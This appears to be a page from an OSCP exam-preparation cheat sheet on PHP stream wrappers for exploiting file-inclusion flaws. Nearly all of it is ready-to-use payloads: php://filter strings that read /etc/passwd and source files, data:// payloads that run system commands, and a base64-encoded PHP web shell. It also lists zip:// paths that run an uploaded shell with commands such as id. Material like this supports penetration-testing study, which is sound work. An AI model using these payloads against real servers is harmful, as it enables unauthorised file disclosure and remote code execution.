> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/lfi-and-rfi/php-wrappers.md).

# PHP Wrappers

```
php://filter/resource=/etc/passwd
php://filter/resource=index.php
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=index
php://filter/read=string.rot13/resource=index.php
```

{% hint style="warning" %}
Its important to try with and without the extension
{% endhint %}

```
data://text/plain,<?php echo system('whoami');?>"
```

```
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=whoami
```

{% embed url="<https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38-------------------------------->" %}

{% embed url="<https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/linux/zipper/foothold>" %}

{% hint style="info" %}
If you have the ability to upload zip files, the **zip\://** will unzip and read/execute the file in the zip file
{% endhint %}

```
zip:///var/www/html/uploads/shell.zip%23shell.php
zip:///var/www/html/uploads/upload_1725881785.zip%23cmd.php&cmd=id
zip:///var/www/html/uploads/upload_1725881785.zip%23cmd&cmd=id
```
